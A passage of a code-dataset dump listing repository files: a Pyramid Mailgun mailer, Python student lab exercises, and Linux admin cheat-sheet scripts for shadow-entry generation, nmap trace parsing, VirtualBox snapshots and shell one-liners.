"4224f53e87801741b94a319622edacfe5fd0ca9f", "content_id": "b089942d7dcac38a69d18f73a1a2fcdf217c3073", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 537, "license_type": "no_license", "max_line_length": 78, "num_lines": 19, "path": "/pyramid_mailgun/__init__.py", "repo_name": "timgates42/pyramid_mailgun", "src_encoding": "UTF-8", "text": "class Mailer:\n\n def __init__(self, settings):\n self.domain_name = settings['mailgun.domain_name']\n self.api_key = settings['mailgun.api_key']\n\n def send(self, email):\n import requests\n requests.post(\n \"https://api.mailgun.net/v3/{}/messages\".format(self.domain_name),\n auth=(\"api\", self.api_key),\n data=email\n )\n\ndef mailer(request):\n return Mailer(request.registry.settings)\n\ndef includeme(config):\n config.add_request_method(mailer, 'mailer', reify=True)\n" }, { "alpha_fraction": 0.8571428656578064, "alphanum_fraction": 0.8571428656578064, "avg_line_length": 62, "blob_id": "8644f536a298d70b362a5c0f0da539203f56f8d5", "content_id": "cbbbdb5b06798cfe845f357aa8a756472079083c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 63, "license_type": "no_license", "max_line_length": 62, "num_lines": 1, "path": "/README.txt", "repo_name": "timgates42/pyramid_mailgun", "src_encoding": "UTF-8", "text": "This package integrate Mailgun service with Pyramid framework.\n" } ]
3
TatianaVelychko/Python-Projects
https://github.com/TatianaVelychko/Python-Projects
f0c2c8d0d3701d2e6a405f210a87e003e8c152f3
c0383677e61c4c67d268c670a790082b249ae3d4
8c2379d42bb868fbbcdae4ded8cb7ac556bcca53
refs/heads/master
2021-07-10T07:52:41.295478
2019-03-05T09:18:07
2019-03-05T09:18:07
146,572,340
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.3731931746006012, "alphanum_fraction": 0.46780550479888916, "avg_line_length": 15.191489219665527, "blob_id": "303dbb1999a6f07e3d4f38768501811e37000226", "content_id": "31889492fbf03fe8a222b340a712c7429c997a02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 788, "license_type": "no_license", "max_line_length": 134, "num_lines": 47, "path": "/lab4.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "#1\n\na = []\nk = 1\nfor r in range(5):\n a.append([])\n for c in range(5):\n a[r].append(k)\n k += 1\n\nfor r in a:\n print(r)\nprint(sum(sum([i for i in x])for x in a))\n\n#2\n\nL = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\ndel L[:2]\nL.extend([11, 12])\n\ndel L[1::2]\nL.extend([11, 12])\n\ndel L[3:8]\nL.extend([11, 12])\n\nL.insert(0, [1, 2, 3, 4, 5])\ndel L[2::2]\n\nprint(L)\n\n#3\n\nmy_len = [['БО-331101', ['Акулова Алена', 'Бабушкина Ксения', 'Зябликова Анастасия']], ['БВ-421102', ['Громова Евгения', 'Кудрявцева Анна']], ['БО-331103', ['Караваева Светлана']]]\n\ns = my_len.pop(0)\nprint(s[0], '\\n', '\\n'.join(s[1]))\n\nK = my_len.pop(0)\nprint(K[0], ':', ', '.join(K[1]))\n\nfor k in my_len:\n print(k[0], '\\n', '\\n'.join(k[1]))\n\nfor S in my_len:\n if S[0].startswith('БО'):\n print(S[0], ':', ', '.join(S[1]))\n" }, { "alpha_fraction": 0.8125, "alphanum_fraction": 0.8125, "avg_line_length": 15, "blob_id": "f5ed66ada4e7c3368e86af672d4f6343aad379a4", "content_id": "075cdef3f789feceb9f8daa1a8f60b272cea67d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 32, "license_type": "no_license", "max_line_length": 17, "num_lines": 2, "path": "/README.md", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "# Python-Projects\ntest projects\n" }, { "alpha_fraction": 0.560026228427887, "alphanum_fraction": 0.589547336101532, "avg_line_length": 27.12738800048828, "blob_id": "acac8366bb8281ada35f0ec76aef1ca3c4e30acb", "content_id": "31a5b0ceb66cf2f8c482bb8fdc3e8882ce4a3940", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5143, "license_type": "no_license", "max_line_length": 355, "num_lines": 157, "path": "/lab_6.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "from tkinter import *\r\n\r\n\r\ndef input_values(a, b, c, k):\r\n try:\r\n counter = ((a ** 2 / b ** 2 + c ** 2 * a ** 2) / (a + b + c * (k - a / b ** 3)) + c + (k / b - k / a) * c)\r\n print(abs(counter))\r\n except ZeroDivisionError:\r\n print(\"Division by zero!\")\r\n\r\n\r\nprint('Введите значения')\r\ninput_values(int(input()), int(input()), int(input()), int(input()))\r\n\r\nnum_list = [12, 3, 10, 14.2, 2.1, -10]\r\n\r\n\r\ndef summarize():\r\n print(sum(i for i in num_list if i > 10))\r\n\r\n\r\ndef maximum():\r\n print(max(num_list))\r\n\r\n\r\nlist_misc = [1, 2, 4, 2.2, 6, 'text', 4.1, -2]\r\n\r\n\r\ndef give_even():\r\n for i in list_misc:\r\n try:\r\n if i % 2 == 0:\r\n print(i)\r\n except TypeError:\r\n continue\r\n\r\n\r\nmy_number = 4\r\n\r\n\r\ndef cycle():\r\n while True:\r\n print('Enter user number')\r\n user_number = float(input())\r\n if user_number >= my_number:\r\n print('Try again')\r\n else:\r\n print('Great!')\r\n break\r\n\r\n\r\nlist_given = ['repeat', 'retest', 'hello', '', '1234567890']\r\n\r\n\r\ndef strings():\r\n print('\\n'.join([elem for elem in list_given if 5 < len(elem) < 10]))\r\n\r\n\r\nfrom random import 
randint\r\n\r\n\r\ndef chars():\r\n for _ in range(5):\r\n print(chr(randint(1040, 1071)), end='')\r\n\r\n\r\nsentence_misc = 'repeat retest 6.2 hello 5 1234567890 0.1 -4'\r\n\r\n\r\ndef digit():\r\n print(', '.join(x for x in sentence_misc if x.isdigit()))\r\n\r\n\r\nimport string\r\n\r\nsentence = 'Пусть дана строка, состоящая из слов, пробелов и знаков препинания.'\r\nexclude = set(string.punctuation)\r\nsentence_first = ''.join(char for char in sentence if char not in exclude)\r\n\r\nsentence_list = sentence_first.split()\r\n\r\n\r\ndef words():\r\n word = ([elem for elem in sentence_list if len(elem) > 5])\r\n print(', '.join(word))\r\n\r\n\r\nfirst_string = 'Ф;И;О;Возраст;Категория;Иванов;Иван;Иванович;23 года;Студент 3 курса;Петров;Семен;Игоревич;22 года;Студент 2 курса'\r\n\r\nM = first_string.split(';')\r\n\r\n\r\ndef table():\r\n print(''.join(M[0:3]), '\\t', '\\t'.join(M[3:5]))\r\n print(' '.join(M[5:8]), '\\t', '\\t'.join(M[8:10]))\r\n print(' '.join(M[-5:-2]), '\\t', '\\t'.join(M[-2:]))\r\n\r\n\r\nsecond_string = 'ФИО;Возраст;Категория;Иванов Иван Иванович;23 года;Студент 3 курса;Петров Семен Игоревич;22 года;Студент 2 курса;Иванов Семен Игоревич;22 года;Студент 2 курса;Акибов Ярослав Наумович;23 года;Студент 3 курса;Борков Станислав Максимович;21 год;Студент 1 курса;Петров Семен Семенович;21 год;Студент 1 курса;Романов Станислав Андреевич;23 года;Студент 3 курса;Петров Всеволод Борисович;21 год;Студент 2 курса'\r\n\r\nitem = second_string.split(';')\r\n\r\nn = 3\r\nnew_list = [item[i:i+n] for i in range(0, len(item), n)]\r\n\r\n\r\ndef surname():\r\n for x in new_list:\r\n for y in x:\r\n if y.startswith('Петров'):\r\n print(' '.join(x))\r\n\r\n\r\nrand_string = 'Пусть дана строка произвольной длины. Выведите информацию о том, сколько в ней символов и сколько слов.'\r\n\r\n\r\ndef length():\r\n print(len(rand_string))\r\n print(len(rand_string) - rand_string.count(' '))\r\n print(len(rand_string.split(' ')))\r\n\r\n\r\nwhile True:\r\n user_input = input('Вы хотите продолжить?')\r\n if user_input == 'yes':\r\n root = Tk()\r\n mainmenu = Menu(root)\r\n root.config(menu=mainmenu)\r\n\r\n usermenu1 = Menu(mainmenu)\r\n usermenu1.add_command(label='Пример', command=lambda: input_values(int(input()), int(input()), int(input()), int(input())))\r\n usermenu1.add_command(label='Сумма', command=lambda: summarize())\r\n usermenu1.add_command(label='Максимум', command=lambda: maximum())\r\n usermenu1.add_command(label='Четные', command=lambda: give_even())\r\n\r\n usermenu2 = Menu(mainmenu)\r\n usermenu2.add_command(label='Число', command=lambda: cycle())\r\n usermenu2.add_command(label='Строки', command=lambda: strings())\r\n usermenu2.add_command(label='Буквы', command=lambda: chars())\r\n usermenu2.add_command(label='Цифры', command=lambda: digit())\r\n\r\n usermenu3 = Menu(mainmenu)\r\n usermenu3.add_command(label='Слова', command=lambda: words())\r\n usermenu3.add_command(label='Таблица', command=lambda: table())\r\n usermenu3.add_command(label='Фамилия', command=lambda: surname())\r\n usermenu3.add_command(label='Длина', command=lambda: length())\r\n\r\n mainmenu.add_cascade(label='Меню 1', menu=usermenu1)\r\n mainmenu.add_cascade(label='Меню 2', menu=usermenu2)\r\n mainmenu.add_cascade(label='Меню 3', menu=usermenu3)\r\n\r\n root.mainloop()\r\n continue\r\n elif user_input == 'no':\r\n break\r\n else:\r\n continue\r\n" }, { "alpha_fraction": 0.595952570438385, "alphanum_fraction": 0.6315422058105469, "avg_line_length": 25.314815521240234, "blob_id": 
"2748ea9dad255835e053e76a7696a0161ba5191c", "content_id": "c0a8f74822ffd4490dacfc6778cf6c1bb90aaf48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1881, "license_type": "no_license", "max_line_length": 333, "num_lines": 54, "path": "/lab3.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "#1\n\nimport string\n\nL = 'Пусть дана строка, состоящая из слов, пробелов и знаков препинания.'\nexclude = set(string.punctuation)\nK = ''.join(ch for ch in L if ch not in exclude)\n\nS = K.split()\n\nM = ([elem for elem in S if len(elem) > 5])\nprint('\\t'.join(M))\n\nH = ([elem for elem in S if elem.endswith('ов')])\nprint('\\t'.join(H))\n\n#2\n\nmy_string = 'Ф;И;О;Возраст;Категория;Иванов;Иван;Иванович;23 года;Студент 3 курса;Петров;Семен;Игоревич;22 года;Студент 2 курса'\n\nM = my_string.split(';')\nprint(M)\n\nprint(''.join(M[0:3]), '\\t', '\\t'.join(M[3:5]))\nprint(' '.join(M[5:8]), '\\t', '\\t'.join(M[8:10]))\nprint(' '.join(M[-5:-2]), '\\t', '\\t'.join(M[-2:]))\n\n#3\n\nmy_string = 'ФИО;Возраст;Категория;Иванов Иван Иванович;23 года;Студент 3 курса;Петров Семен Игоревич;22 года;Студент 2 курса;Иванов Семен Игоревич;22 года;Студент 2 курса;Акибов Ярослав Наумович;23 года;Студент 3 курса;Борков Станислав Максимович;21 год;Студент 1 курса;Петров Семен Семенович;21 год;Студент 1 курса;Романов Станислав Андреевич;23 года;Студент 3 курса;Петров Всеволод Борисович;21 год;Студент 2 курса'\n\nS = my_string.split(';')\nprint(S)\n\nn = 3\r\nD = [S[i:i+n] for i in range(0, len(S), n)]\r\nprint(D)\r\n\r\nfor x in D:\r\n for y in x:\r\n if y.startswith('Петров'):\r\n print(' '.join(x))\r\n\r\nfor z in D:\r\n if '21 год' in z:\r\n print(' '.join(z))\n\n#4\n\nL = 'Пусть дана строка произвольной длины. 
Выведите информацию о том, сколько в ней символов и сколько слов.'\n\nprint(len(L))\r\nprint(len(L) - L.count(' '))\r\nprint(len(L.split(' ')))" }, { "alpha_fraction": 0.42810457944869995, "alphanum_fraction": 0.4444444477558136, "avg_line_length": 16, "blob_id": "9192a0b1f1d668566e35878d20a5569d4bb44fcb", "content_id": "a33153403dcc7518e00a92b70cd0602e6b5210ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 306, "license_type": "no_license", "max_line_length": 104, "num_lines": 18, "path": "/task1.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "print(\"a=\")\na = int(input())\n\nprint(\"b=\")\nb = int(input())\n\nprint(\"c=\")\nc = int(input())\n\nprint(\"k=\")\nk = int(input())\n\ntry:\n S = ((a ** 2 / b ** 2 + c ** 2 * a ** 2) / (a + b + c * (k - a / b ** 3)) + c + (k / b - k / a) * c)\n print(abs(S))\n\nexcept ZeroDivisionError:\n print(\"Division by zero!\")\n" }, { "alpha_fraction": 0.4853146970272064, "alphanum_fraction": 0.5412587523460388, "avg_line_length": 22.65517234802246, "blob_id": "dcd3f4d807ff1694a3a7ec110eb42dd84f132aa2", "content_id": "fb37c8164e5ef2bd299ca0ca35082f44996b2684", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 741, "license_type": "no_license", "max_line_length": 69, "num_lines": 29, "path": "/lab5_2-4.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "import csv\r\n\r\nmyf = open('students.csv', 'w')\r\nmyf.write('№;ФИО;Возраст;Группа\\n')\r\nmyf.write('4;Мамаев Олег Борисович;25;БО-333333\\n')\r\nmyf.write('2;Сидоров Семен Семенович;23;БО-111111\\n')\r\nmyf.write('1;Иванов Иван Иванович;23;БО-111111\\n')\r\nmyf.write('3;Яшков Илья Петрович;24;БО-222222\\n')\r\nmyf.close()\r\n\r\nwith open('students.csv', 'r') as myf:\r\n reader = csv.reader(sorted(myf, key=lambda li: li.split(';')[1]))\r\n lst = [row for row in reader]\r\n\r\nprint(lst)\r\n\r\nmyf = open('students.csv', 'w')\r\nfor elem in lst:\r\n for myst in elem:\r\n el = myst.split(';')\r\n try:\r\n el[2] = str(int(el[2]) + 1)\r\n myf.write(';'.join(el))\r\n myf.write('\\n')\r\n\r\n except ValueError:\r\n pass\r\n\r\nprint(\"Writing complete\")\r\n" }, { "alpha_fraction": 0.5128205418586731, "alphanum_fraction": 0.5897436141967773, "avg_line_length": 17.28125, "blob_id": "a294a155078b028343b9c43b0df291d77399eeac", "content_id": "8e71e03afc5203bdd51face98ee2d0ef9278590c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 585, "license_type": "no_license", "max_line_length": 51, "num_lines": 32, "path": "/lab2.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "# task 1\n\nimport random\n\nmy_number = random.randint(5, 15)\n\nwhile True:\n print('Enter user number')\n user_number = float(input())\n if user_number >= my_number:\n print('Try again')\n else:\n print('Great!')\n break\n\n# task 2\n\nL = ['repeat', 'retest', 'hello', '', '1234567890']\nS = ([elem for elem in L if 5 < len(elem) < 10])\nprint('\\n'.join(S))\n\n# task 3\n\nfrom random import randint\n\nfor _ in range(5):\n print(chr(randint(1040, 1071)), end='')\n\n# task 4\n\nS = 'repeat retest 6.2 hello 5 1234567890 0.1 -4'\nprint('\\a'.join(x for x in S if x.isdigit()))\n" }, { "alpha_fraction": 0.5053191781044006, "alphanum_fraction": 0.5797872543334961, "avg_line_length": 12.5, "blob_id": "7f265206458100dafd5b753966bd9b653e87c04d", "content_id": 
"f52473b88bdc64c0644255fb21897a5edf729bb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 188, "license_type": "no_license", "max_line_length": 36, "num_lines": 14, "path": "/task3,4.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "b = [12, 3, 10, 14.2, 2.1, -10]\n\na = sum(i for i in b if i>10)\nprint(a)\n\nc = max(b)\nprint(c)\n\nd = sum(b)/len(b)\nprint(d)\n\nfrom functools import reduce\n\nprint(reduce(lambda x, y: x * y, b))" }, { "alpha_fraction": 0.6263736486434937, "alphanum_fraction": 0.6263736486434937, "avg_line_length": 32.125, "blob_id": "8f83c174792e7fd56268c757c4b0a892131c8d2f", "content_id": "c521ab180c19b9107ad36f1c99e823ca46904c45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 273, "license_type": "no_license", "max_line_length": 89, "num_lines": 8, "path": "/lab5_1.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "import os.path\r\npath = '.'\r\nnum_files = len([f for f in os.listdir(path)\r\n if os.path.isfile(os.path.join(path, f))])\r\nprint(num_files)\r\n\r\nDIR = '/pypy/venv/Scripts'\r\nprint(len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))]))\r\n" }, { "alpha_fraction": 0.42687276005744934, "alphanum_fraction": 0.4887039363384247, "avg_line_length": 25.129032135009766, "blob_id": "daa902b82322753ceb601f62f279d49df4d63137", "content_id": "ceaafd34bc2503a11faf62415263c06ecbb6c97c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 949, "license_type": "no_license", "max_line_length": 152, "num_lines": 31, "path": "/lab4_task4.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "#4.2\r\n\r\nmy_len = [['БО-331101', ['Акулова Алена', 'Бабушкина Ксения', 'Зотова Анастасия']], ['БВ-421102', ['Громова Евгения', 'Панина Анна']], ['БО-331103', ['Арнаутова Светлана']]]\r\n\r\nG = [j for i in my_len for j in i]\r\nprint(G)\r\n\r\nS = dict(zip(G[::2], G[1::2]))\r\nprint(S)\r\n\r\nfor key, value in S.items():\r\n for k in value:\r\n c = k.split(' ')\r\n if len(c[0]) < 7:\r\n print(key, ':', ''.join(k))\r\n\r\n#4.1, 4.3\r\n\r\nmy_len = [['БО-331101', ['Акулова Алена', 'Бабушкина Ксения', 'Зотова Анастасия']], ['БВ-421102', ['Громова Евгения', 'Панина Анна']], ['БО-331103', ['Арнаутова Светлана']]]\r\n\r\nG = [j for i in my_len for j in i]\r\nprint(G)\r\n\r\nS = dict(zip(G[::2], G[1::2]))\r\nprint(S)\r\n\r\nfor key, value in S.items():\r\n for k in value:\r\n c = k.split(' ')\r\n if c[0].startswith('П') and c[1].startswith('А'):\r\n print(key, ':', ''.join(k))\r\n" }, { "alpha_fraction": 0.32867133617401123, "alphanum_fraction": 0.4055944085121155, "avg_line_length": 16.875, "blob_id": "7d3a0162fc07dd36ccdff3aceadf347c6f909b10", "content_id": "ae99ce2791cfdb9324f3f03c3733c747bdf6036a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 143, "license_type": "no_license", "max_line_length": 38, "num_lines": 8, "path": "/task2.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "L = [1, 2, 4, 'test', 2.2, 6, 4.1, -2]\n\nfor i in L:\n try:\n if i%2 == 0:\n print(i)\n except TypeError:\n continue\n" }, { "alpha_fraction": 0.5274913907051086, "alphanum_fraction": 0.5652921199798584, "avg_line_length": 13.729729652404785, "blob_id": "f8786fdda420c51d1e96e94d42821bcf8ef445d6", 
"content_id": "34e198180267667af9c1309ae47d4d5f40e74934", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 582, "license_type": "no_license", "max_line_length": 82, "num_lines": 37, "path": "/lab2_continue.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "# 2.4\r\n\r\nL = ['repeat', 'retest', 'hello', '', '1234567890']\r\nS = ([elem for elem in L if elem.startswith('r')])\r\nprint('\\n'.join(S))\r\n\r\n# 3.2\r\n\r\nprint('enter S')\r\nS = int(input())\r\nL = 'R' * S\r\n\r\nprint(L)\r\n\r\n# 3.3\r\n\r\nimport string\r\nimport random\r\n\r\nS = ''.join(random.choice(string.digits) for _ in range(6))\r\n\r\nif '3' in S:\r\n print(S)\r\nelse:\r\n print(\"S doesn't continue 3\")\r\n\r\n# 3.4\r\n\r\nimport string\r\nimport random\r\n\r\nS = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(6))\r\n\r\nif S.isalpha():\r\n print('digit is not in S')\r\nelse:\r\n print(S)\r\n" }, { "alpha_fraction": 0.48905110359191895, "alphanum_fraction": 0.5377128720283508, "avg_line_length": 20.83333396911621, "blob_id": "65aa3b1d30838432f4a53899cf9c4df560300c55", "content_id": "5582c3ec84cf140474bfcbd0adba4bb11bef93de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 846, "license_type": "no_license", "max_line_length": 100, "num_lines": 36, "path": "/lab7.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "#1\r\n\r\ndic = {'fruit': ['lemon', 'apple'], 'color': ['red', 'green', 'yellow'], 'drink': ['tea', 'coffee']}\r\nprint(len(dic.keys()))\r\n\r\n#2-4\r\n\r\nmyf = open('students1.csv', 'w')\r\nmyf.write('№;ФИО;Возраст;Группа\\n')\r\nmyf.write('1;Иванов Иван Иванович;22;БО-111111\\n')\r\nmyf.write('2;Яшков Илья Петрович;24;БО-222222\\n')\r\nmyf.write('3;Сидоров Семен Семенович;21;БО-111111\\n')\r\nmyf.close()\r\n\r\ndic = {}\r\n\r\nwith open('students1.csv', 'r') as myf:\r\n for line in myf:\r\n key, *value = line.split(';')\r\n dic[key] = value\r\n\r\nprint(dic)\r\n\r\nmyf2 = open('students2.csv', 'w')\r\n\r\nfor key, value in sorted(dic.items(), key=lambda value: (value[1])):\r\n try:\r\n value[1] = str(int(value[1]) + 1)\r\n print(key, ':', value)\r\n myf2.write(';'.join(value))\r\n myf2.write('\\n')\r\n\r\n except ValueError:\r\n pass\r\n\r\nprint(\"Writing complete\")\r\n" } ]
13
Morketh/Linux-Cheats
https://github.com/Morketh/Linux-Cheats
f10d0884a61d15277c38416e2aafbf12e6178b7a
7f150816affe93bc4bd8c99a0ef3de018667a233
75bf782a4a7640bc1719e5528fd9b704fc2c0d69
refs/heads/master
2020-12-24T16:40:46.825212
2019-10-17T05:37:43
2019-10-17T05:37:43
41,808,812
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.6128318309783936, "alphanum_fraction": 0.6637167930603027, "avg_line_length": 40.09090805053711, "blob_id": "0f35f1d255dc8eda5a35b25070c1cc399b92ebd1", "content_id": "c76e033567b27abf4a91a4e42af9d06a09017e17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 452, "license_type": "no_license", "max_line_length": 100, "num_lines": 11, "path": "/generateShadow.py", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport random, string, crypt, datetime\n\nuserList = ['user1','user2','user3','user4','user5']\ndateNow = (datetime.datetime.utcnow() - datetime.datetime(1970,1,1)).days\n\nfor user in userList:\n randomsalt = ''.join(random.sample(string.ascii_letters,10))\n randompass = ''.join(random.sample(string.ascii_letters,10))\n print(\"%s:%s:%s::0:99999:7:::\" % (user, crypt.crypt(randompass, \"$6$\"+randomsalt), dateNow))\n" }, { "alpha_fraction": 0.6788135766983032, "alphanum_fraction": 0.68813556432724, "avg_line_length": 27.780487060546875, "blob_id": "f04e19d145a3a5822608e331d108255d4cb45524", "content_id": "2f5853f4ffe0d93d916df24718cba92f7a72bae4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1180, "license_type": "no_license", "max_line_length": 221, "num_lines": 41, "path": "/Snippets.md", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "##Sensor Scripts\n\nIPMI Interface\n+ Fan Speed\n```bash\nipmi-sensors | awk '/RPM/{print}'\n```\n\n+ Temperature \n```bash\nipmi-sensors | awk '/Temperature/{print}'\n```\n\n##Find Zero Length files and remove them\n\n```bash\nfind . -size 0c -delete\n```\n\n##KILL users terminals \n```bash\nps aux | grep \"pts\\/[2 4 0]\" | awk '{print $2}' | xargs -I {} kill -1 {}\n```\n\n##MD5Sums\nthis next command will take the file downloaded supply that to md5sum to check files we add the grep in to tell see ONLY lines that DON'T contain \"OK\" that way we can see all broken files and not worry about the good ones\n```bash\nwget -qO- http://URL-OF-FILE/checksum.dat | md5sum --check | grep -v \"OK\"\n```\n\n##Download and decompress to output location\n```bash\nwget -qO- http://URL-OF-FILE/FILE_NAME_HERE.tar.gz | tar zxv -C /PATH/TO/OUTPUT/\n```\n##Proxy over SSH\n```bash\nssh -D LOCAL_PROXY_PORT -p REMOTE_SSH_PORT USER@HOST.org\n```\n+ ```LOCAL_PROXY_PORT``` is the local port you want to set up as your tunnel entry point.\n+ ```REMOTE_SSH_PORT`` is normally 22 unless you have to use a nonstandard port for bypassing a firewall.\n+ ```USER@HOST.org``` is the host your connecting to. 
Normally this is your proxy server.\n" }, { "alpha_fraction": 0.4422857165336609, "alphanum_fraction": 0.4457142949104309, "avg_line_length": 35.41666793823242, "blob_id": "fd2256f519e6ff153bd55f0affe505bf94c02dd9", "content_id": "6db19a69de5a9ee7d209143a0b48f0b53c5462f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 875, "license_type": "no_license", "max_line_length": 71, "num_lines": 24, "path": "/nmap_gephi", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "import xml.etree.ElementTree as etree\ntree = etree.parse('wowser.xml')\nroot = tree.getroot()\nhosts = root.findall('host')\n\noutput_file = open('nmap_edges.csv', 'w')\noutput_file.truncate()\noutput_file.write(\"Source,Target\\n\")\n\nfor i in hosts:\n trace = i.find('trace')\n if not (trace == None):\n hop_count = 0\n for hop in trace:\n if hop_count == 0:\n last_ip = hop.attrib['ipaddr']\n else:\n output_file.write(last_ip)\n output_file.write(\",\")\n output_file.write(hop.attrib['ipaddr'])\n output_file.write(\"\\n\")\n last_ip = hop.attrib['ipaddr']\n hop_count = hop_count + 1\nprint \"Done\"\n\n" }, { "alpha_fraction": 0.36986300349235535, "alphanum_fraction": 0.6426940560340881, "avg_line_length": 31.44444465637207, "blob_id": "bf17bec05e106003f8630676f0c627c848fce2a0", "content_id": "c302517bc8bed8e47eb82271e96f21a346c30e9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 876, "license_type": "no_license", "max_line_length": 107, "num_lines": 27, "path": "/VboxHeadlessSnapshots.sh", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "#!/bin/bash\nVBOXUSR=\"vbox\"\n\n# ADD List of VM Names here for Daily Snapshots\ndeclare -a arr=(\n \"a2ae119a-ba26-4ff7-bfb7-c0857e2bc9e0\"\n \"8028742e-4e03-486e-b4cd-3c861b33a213\"\n \"540bdd79-fb5d-4f78-b367-34332edc177e\"\n \"98fc0d5f-c39f-483c-9570-a7009afcde57\"\n \"ccf063e2-11a4-46ef-8e85-af63f39a4b6c\"\n \"c79d7cec-7a27-4a73-ba71-6b591d5f0678\"\n \"fede01e4-d30d-4f1f-b85c-95a135178d99\"\n \"5ac765dd-551e-48bb-b685-06dcad677c15\"\n \"dbac0da2-0206-4390-9244-d410c2ff53ac\"\n \"4b1100da-26c0-498c-a29d-67d2d5835e4a\"\n \"e77d7fe0-d589-4620-b075-52b15329a712\"\n \"17c58403-cde0-459b-91a9-f414bfbdc678\"\n )\n\n# END VM UUID LIST\n\nfor VM in \"${arr[@]}\"\ndo\n NOW=`date +\"%m-%d-%Y%T\"`\n sudo -H -u $VBOXUSR bash -c \"VBoxManage snapshot $VM take \"$NOW\" --description 'Machine UUID: $VM'\"\n echo \" \"\ndone\n" }, { "alpha_fraction": 0.7575757503509521, "alphanum_fraction": 0.7575757503509521, "avg_line_length": 13.142857551574707, "blob_id": "56cedbf92d7005690c7d809a139f606898ba7bf7", "content_id": "fc9df9b517f76e804e05a3d229040e56d8df1c36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 99, "license_type": "no_license", "max_line_length": 20, "num_lines": 7, "path": "/Common.md", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "```bash\napt-get update\napt-get dist-upgrade\napt-get purge\napt-get autoclean\napt-get autoremove\n```\n" }, { "alpha_fraction": 0.5889636874198914, "alphanum_fraction": 0.6627187132835388, "avg_line_length": 30.743589401245117, "blob_id": "27ec53048f8bf8dde86efb1135c653ed4def5030", "content_id": "c0b94e58498914a02e26aa8878c31beca042cd39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3734, "license_type": "no_license", "max_line_length": 254, "num_lines": 
117, "path": "/Torrent-lists.md", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "\nCOUNT directory tree sort and chop the list and display the last value (works with named torrent files)\n```bash\nclear && ls -shal | awk '{print $10}' | sed -e 's:torrent-::g' | sort -n | tail -n 1\n```\n\n\n```bash\nawk '/<torrent>/{x=\"torrent-\"++i;}{print > x;}'\n```\n\nthe above code results in a split file containing this set of XML tags\n\nthis following snippet will search through an XML style-sheet and grab just the relevant info for the torrent\nyou will note in the following example the <magnet></magnet> tags were replaced to form an actual link\n```\n<title>Half Life 2 plus extras</title>\nmagnet:?xt=urn:btih:19e53b6485d0487d0babeae9c4c600a5eda71f74\n<size>3005661885</size>\n<seeders>24</seeders>\n<leechers>6</leechers>\n```\n\n```bash\nawk '/<title>/,/<leechers>/{print}' rich.xml | grep --ignore-case \"REGEX\" -A 4 | sed 's:<\\/magnet>::g' | sed 's:<magnet>:magnet\\:?xt=urn\\:btih\\::g'\n```\n\n```\n<torrent>\n<id>3234495</id>\n<title>[Request] Bamse - Världens starkaste björn.DivX</title>\n<magnet>eaee71d0c5834e0c91581198c314dd87c6e76854</magnet>\n<size>344371200</size>\n<seeders>0</seeders>\n<leechers>1</leechers>\n<quality><up>0</up><down>0</down></quality>\n<uploaded>2004-08-26 19:43:03</uploaded>\n<nfo>Önskemål: Bamse - Världens starkaste björn. Svenskt tal.</nfo>\n<comments>\n<comment><when>2004-08-27 11:59</when><what>Instämmer med Urkel!&lt;br /&gt;\nFinns det fler bamse-filmer vore det skoj ifall de kom upp på trackern. 